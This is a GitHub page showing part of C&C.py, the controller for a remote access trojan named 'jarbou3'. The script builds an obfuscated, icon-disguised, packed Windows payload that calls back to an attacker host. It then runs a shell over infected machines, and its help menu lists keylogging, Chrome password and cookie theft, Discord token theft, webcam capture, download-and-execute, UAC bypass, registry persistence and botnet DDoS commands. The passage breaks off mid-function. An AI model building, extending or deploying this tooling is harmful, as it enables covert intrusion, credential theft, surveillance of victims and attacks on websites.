-
Notifications
You must be signed in to change notification settings - Fork 1
/
C&C.py
648 lines (567 loc) · 36 KB
/
C&C.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
import random
import socket
import requests
import json
import os
import threading
import platform
from os.path import *
import playsound
if platform.system() == "Windows":
clear = "cls"
else:
clear = "clear"
f = open('serverport.txt', 'r').read()
if f == "{}" or "":
serverport = input('enter serverport:')
with open('serverport.txt', 'w') as port:
port.write(serverport)
keys = open('key.txt', 'r').read()
if keys == "{}" or "":
key = input('enter serverkey:')
with open('key.txt', 'w') as keyser:
keyser.write(key)
def replace_string(filename, old_string, new_string):
with open(filename) as f:
s = f.read()
if old_string not in s:
return
with open(filename, 'w') as f:
s = s.replace(old_string, new_string)
f.write(s)
def checkreqwin():
try:
import socket
import json
import subprocess
import os
import pyautogui
import threading
import shutil
import sys
from os.path import isfile
import random
import string
from requests import get
from webbrowser import open as op
import getpass
import ctypes
from pynput.keyboard import Listener
import time
import win32crypt
import sqlite3
import base64
from PIL import ImageGrab
from urllib.request import Request, urlopen
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import (
Cipher, algorithms, modes)
except Exception as moderror:
print(moderror)
print('run installed.bat and restart the tool')
exit()
def build():
global key
current = os.getcwd()
def genkey(length: int) -> bytes:
return os.urandom(length)
def xor_strings(s, t) -> bytes:
if isinstance(s, str):
# Text strings contain single characters
return b"".join(chr(ord(a) ^ ord(b)) for a, b in zip(s, t))
else:
return bytes([a ^ b for a, b in zip(s, t)])
print("""
1) lhost and lport
2) grab host and port from pastebin ex:127.0.0.1:4444
""")
c = int(input('choose:'))
if c == 1:
lhost = input('enter your host:')
keyhost = genkey(len(lhost))
cryptedhost = xor_strings(lhost.encode('utf8'), keyhost)
lport = input('enter lport:')
keyport = genkey(len(lport))
cryptedport = xor_strings(lport.encode('utf8'), keyport)
icon = ""
while isfile(icon) == False:
icon = input('enter your icon path:')
if platform.system() == "Windows":
os.system('powershell -c cd stub; cp jarbou3.py ..')
os.system('powershell -c cd stub; cp vodkalib.py ..')
else:
os.system("cp -r stub/jarbou3.py "+current)
os.system("cp -r stub/vodkalib.py "+current)
replace_string('jarbou3.py', '$lhost', str(cryptedhost))
replace_string('jarbou3.py', '$lport', str(cryptedport))
replace_string("jarbou3.py", "$hostkey", str(keyhost))
replace_string("jarbou3.py", "$portkey", str(keyport))
key = open('key.txt', 'r').read()
replace_string('jarbou3.py', '$key', key)
print('[+]Compiling')
if platform.system() == "Windows":
os.system('pyinstaller --noconfirm --onefile --windowed --upx-dir upx --icon "' + icon + '" "jarbou3.py"')
else:
os.system(
'wine pyinstaller --noconfirm --onefile --windowed --upx-dir upx --icon "' + icon + '" "jarbou3.py"')
if platform.system() == "Windows":
os.system('powershell -c cd dist; cp jarbou3.exe ..')
os.remove('jarbou3.py')
os.remove('vodkalib.py')
else:
os.system("cd dist && mv jarbou3.exe ..")
os.remove("jarbou3.py")
os.remove("vodkalib.py")
elif c == 2:
URL = input('enter you url:')
u = requests.get(URL).text
sp = u.split(':')
print('host is:' + sp[0] + '\n port is:' + sp[1])
if platform.system() == "Windows":
os.system('powershell -c cd stub; cp jarbou3-pastebin.py ..')
else:
os.system("cp -r stub/jarbou3-pastebin.py "+current)
ask = input('is those your host and port(y/n):')
if ask == 'y':
replace_string('jarbou3-pastebin.py', '$pastebin', URL)
replace_string('jarbou3-pastebin.py', '$key', key)
icon = ''
while isfile(icon) == False:
icon = input('enter your icon path:')
print('[+]Compiling')
if platform.system() == "Windows":
os.system('pyinstaller --noconfirm --onefile --windowed --icon "' + icon + '" "jarbou3-pastebin.py"')
os.system('powershell -c cd dist; mv jarbou3-pastebin.exe ..')
else:
os.system(
'wine pyinstaller --noconfirm --onefile --windowed --upx-dir upx --icon "' + icon + '" "jarbou3-pastebin.py"')
os.system("cd dist && mv jarbou3-pastebin.exe ..")
os.remove("jarbou3-pastebin.py")
else:
os.remove('jarbou3-pastebin.py')
build()
else:
build()
def banner():
banner1 = """
___ _______ ______ _______ _______ __ __ _______
| || _ || _ | | _ || || | | || |
| || |_| || | || | |_| || _ || | | ||___ |
| || || |_||_ | || | | || |_| | ___| |
___| || || __ || _ | | |_| || ||___ |
| || _ || | | || |_| || || | ___| |
|_______||__| |__||___| |_||_______||_______||_______||_______|
By TheNewAttacker64"""
banner2 = """
) _ _
( (^)-~-(^)
__,-.\_( 6 6 )__,-.___
'M' \ / 'M'
>o<
jarbou3
By TheNewAttacker64
"""
banner3 = """
%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@&%%%
%%%%%%%%%%%%%%%%%%%%%%%%(((%(@%%%%%%%@%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%@(%%%%%&(@(((((((*//(@&%,
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%(&%%%((((((%%&%%%/.#%%%%&
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%(%%,&#@#(/((#&%%(* ,/&%((/(((((**
,%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@%###((((((#(#&&@%@#((((#/((((((&@/
%%%%%%%%%%%%%%%%%%%%%%%%%%%%@&%%%%,####@@%%@@%%(#((((((((%/(((((((#%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%#####(((#/@@(((((((&@#########%%#
(%%%%%%%%%%%%%%%%%%%%%%%%%%%%&%%&#%%&*%#(/(((((((####%###@%%%%&%%%%%.
(%%@%%%%%%%%%%%%%%%@%%%%%%@%%%%%(((&(((/#((#((((((((##%####%%%%%%%%%%% .
.%%%%%&@@%%%%@%%%%%%%%%@&%%%@%@@(@((((*(#(((/(@(((((((###&#(/%%%%%%%%%%% @
%%%%%%%%&@@%%@@%%%%%%%%%%@@&%@@(#((((/@&(%&(((((%@@(((@((#(((%%%%%%%%%%%% @ @@
%%%%%%%%%%%@@@&@@&%%%%%%%%%&@@@@@&###%((&#(%&(((@#(&@@#(@##((((*%%%@((&@%%. . @@%@@/
%%%%%%%%%%%%%@@@@@&%%%%%%%%%%@@@@@@&%%(&&@%#(((#(((((@@@#@@(((((((((%%&%@%% @ @ @# @@@@*%
%%%%%%%%%%%%%%%@@@@@%%%%%%%%%@ %@@@@%#&((@#(/((#((((((**@@@@@#####%%%%%%%%%% @% @& @@ @@@@@
%%%%%%%%%%%%%%%%@@@@@@@@@@@@@@###@@@@@@@@@@@@@@@@@@@@@@*/@@@@@@@@@@@@@@@@@@@@@@@@ ,@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@ %@@@@@@@@@@ @@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@
*%%%%%%%%%%%%%%%%%@@@@@@@@@@@@@###@@@@@@@@@@@@@@@@@@@@@*((&@@@@@@@@@@@@@@@@@@@@@@@@( @@@@@@@@@@@@@@@@@@@@@@@@ &@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@
%%%%%%%%%%%%%%%%%%%@@@@@@@@@,%&%##@@@@@@@@@%@@@@@@@@((*((,,%@@@@@@@@@@%%%%@@@@@@@@@ ,@@@@@@@@@ @@@@@@@@ *@@@@@@@@ %@@@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@
%%%%%%%%%%%%%%%%%%%@@@@@@@@%######@@@@@@@@##@@@@@@@@((((((&%@@@@@@@@@%%%%@@@@@@@@@ (@@@@@@@@ @@@@@@@@ @@@@@@@@ .@@@@@@@@ @@@@@@@@, @@@@@@@@ @@@@@@@@@
%%%%%%%%%%%%%%%%%%@@@@@@@@%% ###%@@@@@@@@##@@@@@@@@(((((/(,@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@% @@@@@@@@ @@@@@@@@@@@@@@@@
*%%%%%%%%%%%%%%%%@@@@@@@@%% ###@@@@@@@@&##%@@@@@@@@((((((*%@@@@@@@@@@@@@@@@@@& @@@@@@@@@@@@@@@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@ @@@@@@@@, #@@@@@@@@@@@@@@.
%%%@@@@@@@&%%%%@@@@@@@@%%% #%@@@@@@@@@@@@@@@@@@@@@((((#((@@@@@@@@%%&@@@@@@@@& @@@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@ #@@@@@@@@ @@@@@@@@@ .@@@@@@@@
((((@@@@@@@@%%%%@@@@@@@@%%%%#@@@@@@@@@@@@@@@@@@@@@@(((##(#@@@@@@@@%%%%%@@@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@ .@@@@@@@@ @@@@@@@@@ @@@@@@@@ @@@@@@@@
((% @@@@@@@@@@@@@@@@@@@@@&&&&@@@@@@@@@(((##@@@@@@@@@@@%##@@@@@@@@@@@@%%@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@( @@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@
.%((@@@@@@@@@@@@@@@@@@&&&@@@@@@@@@@#((###%@@@@@@@@@@##@@@@@@@@@@@@%%%@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@
/@%@@@@@@@@@@@@&&&&@@@@@@@@@@@@#######@@@@@@@@#@%@@@@@@@@@@@%%%%%@@@@@@@@& @@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@@@@@% @@@@@@@@@@@@@@@@@@(
.%%%&@%%%%%%%%%%%%%%%###&########%###(&&&&&%%&@#&%*#%%%%%%%%%%%%%%%%%%%%
#%%%%%%%&&&@#%%%%%%%%%###%##%#%&&&&&&&&&&&%%%%%@%@##(((%%%%%%%%%%%%%%%
(%%%%%%%%%%%&&&&&&&&&&&%%%&&&&&&&&&&&&%&&&&&&&&&&&&&&&%#@%%%%%%%%%%%
%%%%%%%%%%%%%%%%%&&&#((&&&&&%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%&#(((%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%(
*%%%%%%%%%%&%@((((//%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%&(%&(&(%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%@%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%
By TheNewAttacker64
"""
banner4 = """
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,/////,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,./*//////.///,,,,,,,,,,,,,,,,,,,,,,
/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,//////,,,*,,,./(,,,,,,,,,,(,,,,/.,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, ////,,,,,,,,,,///(,,,,,.,,,,,,,,/(,,,,,,
.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,&///,,,,,,,,,,,,///(*,, ,,,,,,,,,,/,,,,,,,*
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,%,#,/ . ,,.* ***( ///( @, ,. *, ,/,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,#.,**,,.. . . ..((/(%(////////(/##(///#.,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,/.,,@/,,,,,*/ /**///////////(#///////////(,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,/.,,,,,. *,,,,,,.,(///////////(////#(#///#///## ,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,* ,,,(*****,*/////////////////////,//. / /(/##///# ..
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.. **///, ,,,,,,,,,,,,, .,,*** .*********//////////////( ...,.. .....,*//(/# ., */&@@@@/
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..,.,,,,,,,,, ,,,,,,,,, (*,,, *.***(///////#((/(///////......**..,..,,,,,*,,,,,..*/(@@@@@@@@
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..,,,,,,,,,,,,.. ,,. @,******* ,,/////////((///////////*..,.....,,,,*//(##%%#(*,...,,*(#&%(@@@
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..,,,,,,,,,,,,,.@%****** ******/(*., . ////////////// ( ....,,,,*//(##&&@@@@&#/*,......,,/***
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,/**//,..,,,,,,,,,,*** *,.** *****/**/// .(/.., /(/////// * ///*,.. ,,*//((###%%#%#(/,*%*.......,,,./
,,,,,,,,,,,@,,,,,,,%,,,,,,,@,,,,,,@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,.., ,, #/****.*,** ,*,/***///*///,*(////.,,,##( . (/(/,# .....,,,,,,,,,,,,,,.,,. (///////(#. @
,,,,,,,,,,,,,@@@,,,@@,,,,,,,,@@@,,,@#,,,,,,,,,,,,,,,,@@,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,, . //*//////// ,*.*******/////*// ///////..,,,*,,,,. *********. . .(//////////////. @
,,,,,,,,,,,,,,,@@@@,@@,,,,,,,,,#@@@@@@,,,,,,,,,,,,,,,,,@@@,,,@,,,,,,,,*,,,,,,,, /*//////,*/,#,//,/////*////***(//////////*** .* (////******/(//////////////////*/(#(##(#(//(///////# @ (@@
,,,,,,,,,,,,,,,,,@@@@@@@,,,,,,,,,@@@@@@,,,,,,,,,,,,,,,,,,@@@@,@@,,,,,,*,,,,,,,. .,... //@# //////////////###*////(///////////////////////////////////@#//////////////////////(####*/////@@@@@@&
,,,,,,,,,,,,,,,,,,,@@@@@@,,,,,,,,,,@@@@@,,,,,,,,,,,,,,,,,,,@@@@@@,,,,. ,,,,,,,.,////,.,%/@(,//////////#/(///(///////##////////////(//****@@/// ..(//@@*/**////(///////////(///(##///(@@@@@@
,,,,,,,,,,,,,,,,,,,,@@@@@@,,,,,,,,,,@@@@@,,,,,,,,,,,,@,,,,,,,@@@@@,,,,,,,,,,,,////*///////@@/*.////#(///*,,//#(///,////////////////*********@@ ... ,//***#@@**((//,,*,,****///(//////////*@@@@@
,,,,,,,,,,,,,,,,,,,,,@@@@@@@@@@@@@@*,@@@@@@@@@@@@@@@@@@@@@@@,,@@@@@@@@@@@@@@@@@@@@@@@@////@@@@@@@@@@@@@@@@@@@@@@@(*,////@@@@@@@@@@@@@@@@@@***@@@@@@@@@@@***@@@@@@@@@@@@(/(@@@@@@@@@@@@@@@@@@@@@
,,,,,,,,,,,,,,,,,,,,,,@@@@@@@@@@@@@,,,@@@@@@@@@@@@@@@@@@@@@,,,,@@@@@@@@@@@@@@@@@@@@@@@@@/*/@@@@@@@@@@@@@@@@@@@@@@@@///@@@@@@@@@@@@@@@@@@@@@@***@@@@@@@@*****@@@@@@@@@@///@@@@@@@@@@@@@@@@@@@@@@
,,,,,,,,,,,,,,,,,,,,,,@@@@@@@@@@,,,,,,@@@@@@@@@@@@@@@@@@,,,,,,,,@@@@@@@@@@***,@@@@@@@@@////@@@@@@@@@@//*#.@@@@@@@@///@@@@@@@@@////@@@@@@@@@***@@@@@@@@(** *@@@@@@@@****,@@@@@@@@***//@@@@@@@@@
,,,,,,,,,,,,,,,,,,,,,,@@@@@@@@@,,,,,,,@@@@@@@@,@@@@@@@@@,,,,,,,,@@@@@@@@@** @@@@@@@@@*** @@@@@@@@@//,..@@@@@@@@///#@@@@@@@@////@@@@@@@@@***@@@@@@@@@,,,,@@@@@@@@,. ***,**.********@@@@@@@@@
,,,,,,,,,,,,,,,,,,,,,,@@@@@@@@,,,,,,@@@@@@@@@,,@@@@@@@@*,,,,,,,@@@@@@@@@@@@@@@@@@@@@@,.../&@@@@@@@@@@@@@@@@@@@@/////@@@@@@@@////%@@@@@@@@***@@@@@@@@@,,,,@@@@@@@@,,.,,,,,,,@@@@@@@@@@@@@@@@
,,,,,,,,,,,,,,,,,,,,,@@@@@@@@,,,,,,@@@@@@@@@,,#@@@@@@@@,,,,,,,@@@@@@@@@@@@@@@@@@@@ ,... /(@@@@@@@@@@@@@@@@@@@@/////@@@@@@@@/////@@@@@@@@***@@@@@@@@@*,,,@@@@@@@@(,,,,,,,,,@@@@@@@@@@@@@@@/
,,,,,,,*@@@@@@@@,,,,@@@@@@@@,,,,,%@@@@@@@@@@@@@@@@@@@@@,,,,,,(@@@@@@@@**@@@@@@@@@% ....*/@@@@@@@@/ ,,.@@@@@@@@////@@@@@@@@/////@@@@@@@@***@@@@@@@@@* .,@@@@@@@@@,,.,,,,,,,,.,,, %@@@@@@@@ #
,,,,,,,@@@@@@@@,,,,@@@@@@@@,,,,,@@@@@@@@@@@@@@@@@@@@@@,,, /.&@@@@@@@@**,**@@@@@@@@//...,@@@@@@@@////.@@@@@@@@@///@@@@@@@@/////@@@@@@@@***@@@@@@@@@/, ,@@@@@@@@@,,,,,@@@@@@@@,,, @@@@@@@@
,,,,,,@@@@@@@@@@@@@@@@@@@@@,,,,@@@@@@@@@,,,,,@@@@@@@@@@@#. @@@@@@@@@@@@**@@@@@@@@@@@/#&@@@@@@@@@@@@@@@@@@@@@@//*@@@@@@@@@@@@@@@@@@@@@///(@@@@@@@@@@@@@@@@@@@@@,,,,,@@@@@@@@@@@@@@@@@@@@@ %%
,,,,,,,@@@@@@@@@@@@@@@@@@,,,@@@@@@@@@@,,,,,,@@@@@@@@@@@**@@@@@@@@@@@@***@@@@@@@@@@@.@@@@@@@@@@@@@@@@@@@@@@@/,*. .@@@@@@@@@@@@@@@@@@@/////@@@@@@@@@@@@@@@@@@@,,,,,,@@@@@@@@@@@@@@@@@@@@@
,,,,,,,,,@@@@@@@@@@@@,,,,@@@@@@@@@@@@,,,,,,,@@@@@@@@. .@@@@@@@@@@@*****@@@@@@@@@,*@@@@@@@@@@@@@@@@@@@@@@* * ///////@@@@@@@@@@@@@%//////////@@@@@@@@@@@@@@.,,,,,,,@@@@@@@@@@@@@@@@@@@
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.**,,..* **.***************,,***.///#*//*//,*//#**///////*//////////////////////////////////////(,,,,,,,,,,,,,,,,,,,,,,,,,,,, *
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, @*.,,*.*.********************,***.*/#*//(//*,/( ///**/*///////////////////(#(///////(////////////(,.,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ @******,********************** . *, ***///..*//#/////////////////////////####//////////////////////# ,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@*******************************.** ,***** .**/#.///////////////////#(/#######//////////(.////////(//# ,,,,,,,,,, (,,,,,,,,,,,%
/ ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.@%,*******************************.*** *****, ,/// (//////////////////###########/////////(**(/////(//(//////..////,,/(////.,,,,,
. ,,*// ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@@@********************************,**., .....,..,/..////////,(///////#########(//////#,/***********..*////////,,,*,,,,*,,,/.%&&&%% .
,,,,,,,...,*// ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.@*************************************. *** *//.,//////(///(//////#########//////%,*************** ,,,,,,,,,,,,,,,,,,*,*(*.,,,
.,,,,,,,,,,,,,,.. */// ,,,,,,,,,,,,,,,,,, @@(*******************///*/(***************........//.*.///////////////(#####///////%&,**%&%%***********/& ,,,,,,,, .,.,,, /* ,,,(
......,,,,,,,,,,,,,,,,,,,,...,,,,,,,,,,,, @*************,****(/////////(*************///%// .. ..,//////////////(###///////%%.,,,,,,,%..,%&%,.,,,,,,,,,,,,,,,,,,,, ,*,, ,,,,,
..,,.......,,...,,,,,,,,,,,,,,,,,,,,,,, @#********** **, ***//////////************* /#%#/./ #.%# (/////////////#(///////%#%,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
.....................,,,,,,,,,,,,,,,,,.@***********,*,,,,/,,#/////////(**************,%%./#/.// ##/////////////#(//////%%#%,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
..........................,,,,,,,,, %@*,***********,,, ,.//// ////////*************////./ .(#,#/%///////////////////////#,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
..... .......................,,, ,************ ,..,.//// //* ///#////**********////// #//(#( ///////////////////(//%.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
By TheNewAttacker64
"""
banners = [banner1,banner2,banner3,banner4]
print(random.choice(banners))
def reliable_recv(target):
data = ''
while True:
try:
data = data + target.recv(1024).decode().rstrip()
return json.loads(data)
except ValueError:
continue
def reliable_send(target, data):
jsondata = json.dumps(data)
target.send(jsondata.encode())
def upload_file(target, file_name):
f = open(file_name, 'rb')
target.send(f.read())
def download_file(target,file_name):
f = open(file_name, 'wb')
target.settimeout(1)
chunk = target.recv(1024)
while chunk:
f.write(chunk)
try:
chunk = target.recv(1024)
except socket.timeout as e:
break
target.settimeout(None)
f.close()
def target_communication(target, ip):
try:
count = 0
while True:
command = input('youhacker-Shell~%s: ' % str(ip))
reliable_send(target, command)
if command == 'quit':
targets.remove(target)
ips.remove(ip)
users.remove(users[num])
break
elif command == 'back':
break
elif command == 'clear':
os.system(clear)
elif command[:6] == 'upload':
print('[*] uploading file')
try:
upload_file(target, command[7:])
except:
print('[-] Error in Uploading')
else:
print('[+] file uploaded')
elif command == 'ngroksetup':
if isfile('scripts\\ngrok.exe') == True:
print("[*] Uploading Ngrok.exe")
try:
upload_file(target, 'scripts\\ngrok.exe')
except:
print("[-] Error Uploading Ngrok")
else:
token = input("enter your ngrok token:")
target.send(token.encode('utf-8'))
print(target.recv(1024).decode())
continue
else:
pass
elif command[:8] == 'download':
print('[*]Downloading ' + command[9:])
try:
download_file(target, command[9:])
except:
print('[-] Can t download the file')
else:
print('[+] File Downloaded')
elif command[:10] == 'screenshot':
print("[*] Taking Screenshot")
try:
f = open('screenshot%d' % (count) + '.png', 'wb')
target.settimeout(3)
chunk = target.recv(1024)
while chunk:
f.write(chunk)
try:
chunk = target.recv(1024)
except socket.timeout as e:
break
target.settimeout(None)
f.close()
except:
print("[-] Can t take screenshot")
else:
print("[+] Done Screenshot Saved As screenshot%d" % (count) + ".png")
count += 1
elif command == 'help':
print(('''\n
quit --> Quit Session With The Target
isopen --> Scan a Client port Syntax=isopen ip:port
clear --> Clear The Screen
cd path --> Changes Directory On Target System
upload filename --> Upload File To The target Machine
download filename --> Download File From Target Machine
keylog_start --> Start The Keylogger
keylog_dump --> Read keylogged logs
keylog_stop --> Stop keylogger
open_link --> Open a URL
screenshot --> make a screenshot
dexec --> download and execute file from the internet
start --> execute a programme
run-pwr --> execute powershell command
msgbox --> show msgbox ex:msgbox|yourtitle|yourtext
chrome_recon --> recover Chrome Passwords
disteal --> Get Discord tokens
priv --> Check User Priv
sysinfo --> get system information
say --> make Target Computer talk ex: say something
clip --> change data in clipoard
pslist --> print the running process on the client
kill --> kill running process with pid example:kill 1009
screenshare --> stream client screen
ssharescreen --> stopstreaming
ngroksetup --> download ngrok on the client
webcam_snap --> open target webcam and get Pic ex:webcam_snap 0
webcam_list --> get Available Webcam Sources
changepolicy --> execute powershell scripts
cwallpaper --> change wallpaper
bypass-uac --> try to bypass uac
findfiles --> example findfiles|txt|C:\\
playsound --> play wav file in the background (just .wav)
av_recon --> Get Infos about Av
Get-Cookies --> Grab Cookies From Chrome
Http-Server --> Start python Http Server for Browsing Files
Http-Sestop --> Stop the Http-server
ddosattack --> make all bots attack website for you command syntax ex:ddosattack website,ip|port
persistence *RegName* *fileName* --> Create Persistence In Registry'''))
elif command[:11] == 'screenshare':
upload_file(target, 'scripts\\screenshare.ps1')
elif command[:11] == "webcam_snap":
print('[*] Openning Webcam')
try:
download_file(target,'webcam.jpg')
except:
print("[-] Error Getting image")
else:
print("[+] Image Captured")
os.system('start webcam.jpg')
elif command[:10] == "bypass-uac":
print("[*] you will lose session after trying exploit")
targets.remove(target)
ips.remove(ip)
users.remove(users[num])
elif command[:5] == 'dexec':
print(target.recv(1024).decode('utf-8'))
elif command[:10] == 'cwallpaper':
if isfile(command[11:]) == True:
print("[*] Uploading Picture")
try:
upload_file(target, command[11:])
reliable_send(target, 'somedata')
except:
print("[-] Something Wrong")
else:
print("[+] Wallpaper changed")
else:
